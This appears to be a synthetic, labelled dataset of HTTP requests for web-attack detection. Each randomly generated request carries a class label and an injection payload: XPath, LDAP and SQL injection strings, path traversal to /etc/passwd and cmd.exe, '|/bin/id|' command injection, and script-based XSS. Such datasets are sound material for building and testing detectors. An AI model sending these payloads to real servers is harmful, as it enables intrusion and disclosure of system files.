Upgrade: unHis2/9.7, sDw/8.7
Warning: 247 www.hxe31.png "9a02iegsdsel8esiecoC" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44071
Start - Id: 49416
class: XPathInjection
GET /ra7uawhe4rraseDse/h7MB0Gin/vul/eeeSiwsl7tuesRltet/iystyleZGc8aT.fGco/h8xc3pimcdmuc/rbEjI48g/EJjxRg/smOstiT9i/oengaekO7tirtaznuta.php3?5z4e9ioydtzosr=mYOt%27+++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++++%27bihcgg2%27+%3D+%27 HTTP/1.0
Host: 26.4.183.49
Connection: keep-alive
Accept: audio/*;q=0.5, audio/*;q=0.8, application/zip;q=0.4
Accept-Charset: x-mac-icelandic;q=0.1, koi8-r, iso-8859-8;q=0.8, iso-8859-2;q=0.5, iso-8859-5;q=0.1
Accept-Encoding: *
Accept-Language: u-mlnta2sc, td5r9aeH-dosb736d;q=0.3, 4ai-ertat;q=0.8, 4haoot-eenei;q=0.2, jaie2h-rty
Cache-Control: no-cache
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="37"
Date: Sun, 12 Jul 09 06:52:23 UTC
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: denean=anNwroTo
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Wed, 30 Apr 08 11:41:36 GMT
If-Match: "_9QTrUaBVPXaYoFY1"
If-None-Match: "_Nd3dywAkmrpNqFE74"
If-Range: Sun, 11 Feb 07 15:57:34 CET
Max-Forwards: 0596
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest username="DtanLIte"
Authorization: Digest nc=A74a4Ae1
Range: 77585-376599
Referer: http://www.R1atl.it/nWKa/ameSnla/oeoesave.jpg
TE: gzip;q=0.9,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 4.4; yt-rB; rv:3.3.3) Gecko/15081000
UA-CPU: StrongARM
UA-Disp: 422,204,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: roOe/0.5 www.yjarcai.png:6
Transfer-Encoding: gzip
Upgrade: dec/5.5, 4kklt/1.7
Warning: 222 29.185.139.144 "meri5fe" "Sun, 16 Aug 09 09:30:25 UTC"
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49416
Start - Id: 45822
class: PathTransversal
GET /o3ne/C8formxpwFY-/9QZRy.G7AFNKX@2QI1mg/hg1e_75.4/EeErF8lcsiai/6Zj0P9Vw7oET2dfT/o.hOt/Srircsynirl/rsQa.jpeg?andFbny=%5CWINNT%5Csystem.ini&zc1=5713&ighireebT=C&oieiba9er=fxa4.&rocesDiiw=708&3xtnoI6f5o=taetninsertnfc%5Caxmld3h%3BL%29&slribtUr637gdc=rodsecwnwsoau&eersl2rioosstd=tea&szno=%5By2s&ici=s%3Ad+ercp9is%29&rvr9p-Ak=z-bdro HTTP/1.0
Host: 36.79.150.212:80
Connection: keep-alive
Accept: text/xml, text/plain;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: compress, deflate;q=0.5, deflate;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Cookie2: $Version="357"
Date: Sun, 04 Jul 04 23:20:23 CET
If-Unmodified-Since: Sat, 06 Mar 04 08:55:29 GMT
If-None-Match: *
If-Range: "BHEpDFJsJOIj@zv"
Max-Forwards: 40
Proxy-Authorization: NTLM YXJhZmpjaHJlemlsZWNwbXJ0YXVuc2VlaUF0YWQwRXNSb3R5Y2w=
Authorization: Basic ZWNocmI6ZUhzZ3ZFemc=
Referer: http://www.cih5diND.com/ej9wkw/a8snts/uhQn/sintyg/sgetr.shtml
TE: gzip;q=0.4,gzip;q=0.8
User-Agent: stlqOrxOO
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
Upgrade: oeqAi/2.8, azod/4.0
X-Serial-Number: 72162010

null

End - Id: 45822
Start - Id: 48742
class: XPathInjection
GET /eG/hd5auis5gnm2utd.css?sw9iyaicdnrti0=hnn0otleth7wcan&oSheRz1Salni=buy&inobject-V=iae8%2Fmori%2FoSi%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D+or+%27qUa%27+%3D+%27&rylwoeslYrkBesu=14179&70o=100833 HTTP/1.1
Host: 78.177.110.114
Connection: close
Accept: */*
Accept-Charset: windows-1252, x-mac-roman;q=0.5, windows-1254;q=0.2, x-mac-hebrew;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: ir-ir;q=0.6
Cache-Control: no-store
Client-ip: 234.124.176.228
Cookie: suonparnitse=kdetaw
Cookie2: $Version="20"
Date: Sat, 24 Oct 09 21:15:57 CET
ETag: W/"PspXBVtFw6MVjqF-1t"
Expect: bcutdha=fLiR
From: lYglyt2@7smfrhi.org
If-Modified-Since: Wed, 24 Nov 04 11:13:40 GMT
If-Unmodified-Since: Wed, 14 Nov 07 17:19:03 CET
If-Match: "uT-ue5yiX1eUubDT."
If-None-Match: *
If-Range: Sun, 09 Sep 07 09:32:50 CET
Max-Forwards: 790
MIME-Version: 9.4
Pragma: orR='tItvsia9'
Proxy-Authorization: Digest opaque="dmhss"
Authorization: ipell hd9inJu4=onthee52
Range: -506333,18704-151605
Referer: /TyIIas.shtml
TE: deflate,gzip;q=0.2
Trailer: Upgrade
User-Agent: t8VCvcJt http://www.a2aee.org
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: snxger/8.8 www.rtheu.css, 3.9 232.234.117.48
Transfer-Encoding: gzip
Upgrade: dHRher/7.4, eng/4.5
Warning: 110 www.nsio.html "gbuonm" "Sun, 29 Jul 07 09:27:30 CET"
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48742
Start - Id: 43174
class: OsCommanding
GET /AKRDallconnect7a/ncitycat/evEeU0cqDC/r7attfltrqEtrpoo/2ap8trhhu/q0Uht2/.Kc/sEcn/rxloid.js?rNnsa9qees=leYyluuvlteqssY&72tv9nHndod=134266&asnns7zee9tqu=seeovta9e&nLe3ehita=Tpeteoh&oelncaa3n8=1&aiahitloeih3ih=nRbUtWT&ffeae=fevbscript&ylgnfc=%7C%2520%2Fbin%2Fid%7C&mF6SdZF=692148761&hauamHe=9nNtchn HTTP/1.1
Host: www.wZsead.net
Connection: ilwg95es
Accept: audio/basic, text/*, audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=89703
Client-ip: 174.7.46.175
Cookie: vEenuoand4oogSe=Eeq2se6telnet;9l1i1ct=otoy7xce;iaOEtt=08467;eeu5ohlh=3001891
Cookie2: $Version="3"
Date: Sun, 07 Mar 04 10:27:42 UTC
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: spog@iutmqee.net
If-Modified-Since: Fri, 05 Mar 10 06:21:51 GMT
If-Unmodified-Since: Sat, 06 Oct 07 10:03:27 UTC
If-Match: "EGW_uXyBFzbUOj1Awf3"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: *
Max-Forwards: 3
MIME-Version: 6.0
Pragma: a7r20='al'
Proxy-Authorization: coloIh rs8x9a=2Iwcett
Authorization: Digest nc=aB8a6c30
Range: 332370-1588,656-95
Referer: /atcgthfr.php4
TE: gzip
Trailer: Max-Forwards
User-Agent: rtsnxAkyagjgH
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 5.0 www.teuae.jpg, hcrdll/4.0 97.176.141.79, FTP/1.2 112.145.75.223
Transfer-Encoding: deflate
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 415 2.136.43.50 "wzmsseuobh" "Mon, 09 Jul 07 20:41:04 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43174
Start - Id: 47490
class: XSS
GET /2@zH/alt7OltoAii.css?to=yrcNditsdwop1&nse=oS4er-eeb&ltssrskl=447&JMdeleteuyqs=%3Cdiv+style+%3D+++%22++++binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.arsi.com%2Fscript%2Fadaccs.bin%5D%29%3B+%22++%3E&TtjbI8e=alikeS%3E&6Zfc2KI=adRiiJAsm&xZyH8@QC=tietc&er=9066582&UHXe=i%3ARat+sy&noihrsr3=wsxobjectsvbitw&VNdmei=sotlehspbh9o%3E1&h3hct3eooouiQtn=Bsoiieaisoek HTTP/1.1
Host: 103.65.94.122
Connection: o2tra0e
Accept: audio/*, text/plain;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=40
Client-ip: 229.228.100.156
Cookie: imlta=57078;noceAettlE=2706995688;avegvyan=elsg7i;oy=uIzi;nsurle=t;adgfrsdaeicd4rh=45749
Cookie2: $Version="751"
Date: Wed, 31 Jan 07 24:00:52 UTC
ETag: W/"NSxL_5tTC4DMTJwF"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Thu, 31 Jul 08 17:37:27 GMT
If-Unmodified-Since: Sun, 31 Aug 08 12:28:57 CET
If-Match: "DhUWvLJX-LYlAzn"
If-None-Match: *
If-Range: *
Max-Forwards: 556
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: Digest response="aF19fF8547659c9C611DCa1B6Ac0a6dB"
Range: 9183-933,-0
Referer: /etrnd/tantusaz.avi
TE: gzip,gzip;q=0.2
Trailer: Authorization
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 9.4; gO-tU; rv:8.9.4) Gecko/46661950
UA-CPU: x86
UA-Disp: 612,9205,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: compress
Upgrade: qeobOo/1.5, nnmpa/1.1, ijxs/9.6, yly/6.2, grn/3.6
Warning: 377 www.ttf1aee.tiff:8 "utk7eeufto6reia" "Thu, 23 Jul 09 20:34:19 CET"
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47490
Start - Id: 45197
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: www.e8jhthjcw.ch
Connection: hitts
Accept: text/xml, image/gif;q=0.6, text/*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: deflate
Accept-Language: eaifniq-yetmhgn, wogsi9C0-t;q=0.3, hi-ainNedos
Cache-Control: only-if-cached
Client-ip: 174.161.148.39
Cookie: 90Ie=247467;rot8e=468;_jOfPQoptwV=18516;lHl1Ar7h=8602;4Sqonln=33615
Cookie2: $Version="58"
Date: Sat, 30 Jul 05 24:45:16 CET
ETag: W/"5P7OUM98bOhr6Jn"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Thu, 29 Apr 04 22:38:59 GMT
If-Unmodified-Since: Sat, 15 Aug 09 18:00:52 CET
If-Match: "w0ZSW-nE_NJWVtv"
If-None-Match: "4jPsTu1v0asCD8QAp"
If-Range: *
Max-Forwards: 6
MIME-Version: 1.6
Pragma: msi7tS=oaesapy
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: Digest nc=8b2D49ef
Range: 338-,-31040,26925-
Referer: /aehAtciw/tsecroEs/emtaiRny/we4ttwu1.mdb
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: 8lslNft69p/6.4.8
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: FTP/1.5 www.eeimnd.tiff, 1.5 www.acpqao.shtml
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 12.15.76.12
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45197
Start - Id: 43819
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 13.113.193.109:80
Connection: close
Accept: text/xml
Accept-Charset: *
Accept-Encoding: compress;q=0.5, deflate;q=0.9, compress, compress, deflate
Accept-Language: dt-t;q=0.6, o-mmi;q=0.1, ude-0aiob, Lk0rdus-zn;q=0.7
Cache-Control: 7uteo=wdhprq
Client-ip: 124.28.157.145
Cookie: r7t97=ioijvx4;3bsktmrreFa4t5=s;rHksIj;oovAhgixl=ttdodrenPxey;dhubssnpSeeq=EsP&;JjRMT1Y7lsKJ=777;em=TIchsareplacea ss)beeet
Cookie2: $Version="513"
Date: Thu, 27 Dec 07 18:02:14 GMT
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: nNdc@ioesest.fr
If-Modified-Since: Thu, 08 Jul 04 11:04:37 UTC
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: "9nhat7-TWn@3Iy1Thkn"
If-Range: *
Max-Forwards: 5
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Digest opaque="aias"
Range: 7246-,-7950
Referer: http://www.Ouxs.cz/miR3/xohr/slsDt/sretTwu/gzttexsk.txt
TE: chunked
Trailer: Accept-Charset
User-Agent: thir/2.9.6
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6925x167
Via: 0.7 www.itme.htm
Transfer-Encoding: identity
Upgrade: p3d/0.6, 4skh4H/9.8
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43819
Start - Id: 46059
class: PathTransversal
GET /aeC/er85aEfAPEyxSSu/yX/wOeincs/qxmlxpVHw2tmpVzsAg/teeta1n8/2Ee4Cy/dByRWJogM/t3R2siMZYLAYQ@0A2DN.gif?ciIndbxsustyef=puq1&tw8iPaholh=99cienjde3&pbn=oglts1&eons2Trir=tk1O&ttsSmrlyuide=+ez&ekxmnisK=upouleogdcIs8art&hrakh3KYc=aag2oxfotihizu&aSABhsrtEssriio=ls HTTP/1.1
Host: 178.36.239.245:7
Connection: keep-alive
Accept: */*
Accept-Charset: big5, shift_jis;q=0.0, euc-tw, windows-1250;q=0.0
Accept-Encoding: 
Accept-Language: b-e1;q=0.8, amots-5Ts4w;q=0.1, iss2et-iynr2
Cache-Control: n=7t7z
Client-ip: 161.201.44.66
Cookie: ncnluqtmnuasv=2;lunI=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cookie2: $Version="569"
Date: Tue, 11 Nov 08 22:46:40 GMT
Expect: 100-continue
From: nrr9te@7ulekE.it
If-Modified-Since: Fri, 30 Apr 10 04:21:58 GMT
If-Unmodified-Since: Thu, 09 Aug 07 01:56:19 GMT
If-Match: "gh.o@XcgXzA5aBD"
If-Range: *
Max-Forwards: 46
MIME-Version: 2.6
Pragma: bee=flb7h
Authorization: Crdo naani=coy9ts
Range: 245987-,327-287216
Referer: http://www.hcbbd.gov/nlrsm/ye9r/qtMreu/terng.tar
TE: trailers
User-Agent: Mozilla/8.4 (X11; U; Linux i386 5.9; na-te; rv:1.6.2) Gecko/95824818
UA-OS: Windows 95
Via: FTP/6.0 36.187.75.62, 9.7 www.rxhlj.html
Transfer-Encoding: nmhd; ernggzoE=sievas
Warning: 082 122.217.60.86 "2yhqit" "Wed, 08 Feb 06 22:21:01 CET"
X-Forwarded-For: 232.217.218.144

null

End - Id: 46059
Start - Id: 38858
class: LdapInjection
GET /761/evrE/4midsP@evalTexec/ua0/35iqrlmnfl6/Ed/sLmD/rNvEBz..HM/nMW5ul@6W/6rVi2jTQ00S4.php3?eDo=8220594&rjhqotLrteQ1i=hr+&uds=e4inE%29%28++%7C+++%28lsnsq%3D*%29&thtEoXexlui=nmE.Iw6gG&io16ae1=09se3fyellfsa&fenarpi=mtdelete+ HTTP/1.1
Host: 119.215.113.106:80
Connection: AIfiM8u
Accept: */*
Accept-Charset: windows-1258;q=0.4, windows-1251, iso-8859-4
Accept-Encoding: *;q=0.2
Accept-Language: o00-8, rokda-lOe5i;q=0.4, lysweal-littis;q=0.2, ts8x2qro-tnun, e9-teb9c;q=0.9
Cache-Control: only-if-cached
Client-ip: 149.133.119.108
Cookie: athIggo=0;opIt2=sLsoa;ede=Bylnrcn8wser;mpokNesnmttt=79614918;ushtg=msUopassthru;siYy=u2og
Cookie2: $Version="90"
Date: Fri, 19 Nov 04 18:47:31 GMT
ETag: "bVKwugiMy5hN4Kvx_jnd"
Expect: beeepata=O503do;rmagetie
From: tdusret@b5koNnc.biz
If-Modified-Since: Sun, 25 May 08 09:37:27 GMT
If-Unmodified-Since: Wed, 23 Jan 08 14:07:09 UTC
If-Match: *
If-None-Match: "-TK5-yCJjZAv.aKI7jV"
If-Range: Mon, 27 Jun 05 16:58:12 CET
Max-Forwards: 17
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic ZWxOdWE6b2VwZG53eQ==
Authorization: Basic bWVuaXNPOnRlZVJoaQ==
Range: 317-,-056
Referer: http://www.d5q3etl.biz/eEent.bin
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: ijexeaooE (siO@PfvosC; 14UUyNjA)
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 1.1 10.199.113.222
Transfer-Encoding: gzip
Upgrade: tey/4.0, 12heee/5.9, ilc/0.2, rztl/8.5, cehnt/0.1
Warning: 379 www.6ysC.gif "edmne8u3araEnhR" 
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38858
Start - Id: 49433
class: XPathInjection
GET /ssOZ.dl@cS8/k2x.QHYL9.tI@xqK7@iN/eM/0dn/aoUs8E/raothcsxttst/awggaugtonofnl2t.exe?deiana9ilohda7a=srnrwsdynvmeNr8Qiu&e1UuxN=0dkrwz&nitsLh=64140503&2sro3laa=927&tcresq9Ii=i9t&ldfBpveu=cdZItQnlQ&qstunist=crc&imtw7en=kb&annNbIqnph-=hsrl%3Csidlikxml++&eooeEetg=osgm0wi&encnpnTpeS5iPn=wnxaI0aa&ksndlttady0hoyG=drC&enaensrehinesie=tcylttaccess_log&07U59dsbm=oNc%2FEg%2F4ntd%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D9%5D+++++%7C++++ttnot%2Fucr%2FRteo%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D76%5D+++or+++++%27ss8%27%3D++%27&7Bo3hhicns8qi=4259 HTTP/1.0
Host: www.etoes4c.gov
Connection: close
Accept: audio/*, audio/basic;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: si-3;q=0.5, 4h-6hbm, g-iyshd;q=0.8, g-ha;q=0.3
Cache-Control: max-stale
Client-ip: 64.61.159.147
Cookie: eelo=187588325;etZ3v=a4sb_9;oX1NZja60dkF=1915;etrh=lxK4HWs@;axevh=46012669
Cookie2: $Version="9"
Date: Sun, 14 Sep 08 18:01:00 UTC
ETag: W/"ejqFZhI5TcGO4Bv7qGx6"
Expect: eYoeeGr=eejts
From: poiter@eorm.biz
If-Modified-Since: Tue, 08 Sep 09 23:53:49 GMT
If-Unmodified-Since: Sat, 24 Oct 09 03:43:30 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: *
If-Range: Sat, 10 Dec 05 22:53:27 UTC
Max-Forwards: 6
MIME-Version: 3.8
Pragma: rp='aa8d'
Proxy-Authorization: Basic dHR0clJ5dTY6Zm9kamM3Yg==
Authorization: Basic YXc0b3lobjplZGFhZ2M=
Range: 60-32,32547-,55039-
Referer: http://www.weit5a.fr/Onsexw.bin
TE: chunked,trailers
Trailer: Expect
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 5.3; en-8o; rv:5.3.7) Gecko/61185020
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: aYsnt/6.2 www.eto7.tiff, HTTP/4.9 www.0oteOpIe.js, 2.6 26.178.55.229:3
Transfer-Encoding: ofet; oyloye=ti7qs1
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49433
Start - Id: 42107
class: SqlInjection
GET /evalKHz/itZ9edilacog/LkIqlFGxz/A6EySyJzdiv/nY/W0awindow.openYCMY/ehTnGservicesB5JEbscriptzYr.html?2a3luid=149599&tntiusswlWo9Xsd=38978&dSI9H-R=5&uaeiee7ntedksp=585&te=l&osDhesT50nI3=qwer%27++or+++e9s_v.Account%3D%27lArwsecr%40yne.com HTTP/1.1
Host: www.ehN6siTge.biz
Connection: uisehe
Accept: */*
Accept-Charset: koi8, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 139.71.160.209
Cookie: 3OA=njnrust;Cdd-.M.xterm=T=iframea;talm 3 between
Cookie2: $Version="85"
Date: Sat, 18 Dec 04 21:05:53 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: elzgh
From: ri9it34@rxsle.fr
If-Modified-Since: Fri, 19 Jun 09 17:38:37 GMT
If-Unmodified-Since: Mon, 19 Feb 07 05:43:37 GMT
If-Match: *
If-None-Match: "8num7ugxL35pbuG7Y"
If-Range: *
Max-Forwards: 985
MIME-Version: 0.9
Pragma: lof=Tc2usg
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Basic cmduYTp0Nm10cnVubg==
Range: 80-3804,023297-91,09-
Referer: /sGnnn/imei8u7a/1isndst/eiiltlTe.pl
TE: trailers
Trailer: Transfer-Encoding
User-Agent: aesrmesqExUauhb61
UA-CPU: Sparc
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 830x020
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: identity
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 291 136.225.173.99 "ihnTeaIeqrrr4vsorh" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42107
Start - Id: 49485
class: XPathInjection
GET /afjQk/n0O/s10DqR-StEODRnv6bV/VtMv99k4Ips/mIZjVXIyMAiN_R/t9L8waeqm0Y10O.msf?boenom=scKxWjXs&Z_rd=yF%2Fotdda%2F5fet0h%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D++++or+++%27veeieen%27++%3D%27 HTTP/1.1
Host: www.sV9te.fr
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: iso-2022-jp;q=0.9, isiri-3342;q=0.7, windows-1250, windows-874
Accept-Encoding: 
Accept-Language: es-tRbwaDca;q=0.2, aeimdhue-yp;q=0.8
Cache-Control: no-cache
Client-ip: 246.26.86.133
Cookie: ee4=3;UYa4DUekur1=421204255;etnHole3uoemo=27206546
Cookie2: $Version="3"
Date: Sat, 10 Feb 07 19:39:23 GMT
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: H4ft@ataqsdls.net
If-Modified-Since: Wed, 27 Jun 07 19:14:08 GMT
If-Unmodified-Since: Sat, 08 Dec 07 17:06:32 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Jul 08 09:29:41 GMT
Max-Forwards: 999
MIME-Version: 2.1
Pragma: das2eea='eht'
Proxy-Authorization: Digest cnonce="isagrr"
Authorization: Digest uri=http://www.n4umi.ch/eegig8h.swf
Range: -012
Referer: /rieiahr/41agas/coisoac/hhrauz/1inarh.png
TE: gzip,chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/5.9 (compatible; c0ssaie6tO; Solaris; iyeHsaoll; szheitgrri; eihw6vvn)
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: gzip
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49485
Start - Id: 44409
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 237.19.23.177
Connection: close
Accept: image/*;q=0.0, video/*;q=0.8, text/*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: 7te7-sokHob;q=0.7, hoN-aia7err, ti-nfiI
Cache-Control: min-fresh=56
Client-ip: 136.18.89.145
Cookie: ssbmna=5
Cookie2: $Version="3"
Date: Tue, 10 Jul 07 24:06:03 GMT
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: on76@weg6se.uk
If-Modified-Since: Thu, 12 Mar 09 09:32:12 GMT
If-Unmodified-Since: Sat, 16 Oct 04 04:37:40 CET
If-Match: ".zENt@CR_3AdIjl3HpF"
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: "tSAH3lz8Majy6XN"
Max-Forwards: 4584
MIME-Version: 6.5
Pragma: iee99='h'
Proxy-Authorization: ewtxee iOsamfm=Clcele
Authorization: oigi5 uil1eat=nanstcl
Range: 07334-,0929-,-17620
Referer: /sljr/ta2tt/ashjnqm.mspx
TE: trailers,deflate,gzip
Trailer: Warning
User-Agent: clui (36@Koe-hp; iWgA3Mi4; hgiQPz)
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6396x837
Via: 6.1 125.113.168.19, FTP/3.8 www.HnTdo.jpeg, 8.5 171.237.138.74
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 207.201.80.136
X-Serial-Number: 16197588346334119700
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44409
Start - Id: 48023
class: XSS
GET /cAoip5o7euhreie3/T-fJlST/srXm1p9Goz.Uluhaving/tQ8Yz/eQZdbwwQ2mHLEtvT/axME.2TQFODCdmc1FZ/xOr/passthru50q0Zah5Zq-u.php?tg9a=17&btertaqIml9e=c%7Ce8&ties5ishHE=otexecs&Tlllmtin=e%3E+eaduhrsrn2&catbah6xgsse=iomwerzrbireGosee&mn=rB6tsuJm-z&ceotedZ=Oma1MNyeebiwntTped&fte5ce9=OlceAedl2&qenyEeniT=%3Cimg++++src+++%3D+++%22++livescript%3A%5Balert%28%27csdvi%27%29%3B%5D++%22++++%3E&pihsg7r=255728&one=tuaaw%28x&e6ti=%7C%25%3Bsip&3TQy_rSwbJO=8ws HTTP/1.1
Host: www.zbEeheA.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 8.30.164.22
Cookie: jaft8CexrLibt=2770492
Cookie2: $Version="114"
Date: Thu, 14 Jan 10 11:37:58 CET
ETag: "GJ8gcU4@LIDaCNFpkX9Z"
Expect: 0er3ncru
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 20 Dec 08 19:13:05 CET
If-Unmodified-Since: Wed, 24 Mar 04 04:26:54 CET
If-Match: "ObLaTPHaQn.IRrY"
If-None-Match: *
If-Range: Mon, 12 Apr 10 20:43:26 CET
Max-Forwards: 044
MIME-Version: 4.1
Pragma: c7h=meev
Proxy-Authorization: uedrde k86eh=jiih
Authorization: NTLM bG9lZWRlTDJlaHJ0bm1hclRTbnRtaWdzb3Z0SWl5V2VtNXQ=
Range: 3837-2
Referer: /5vrm/qqwoe/eesnl/n3lacSlm.gif
TE: chunked;q=0.8
Trailer: Accept-Charset
User-Agent: eahntoucveernz
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: HTTP/3.5 www.czeacsu0.css, 4.9 www.hc6ot.js:9007
Transfer-Encoding: gzip
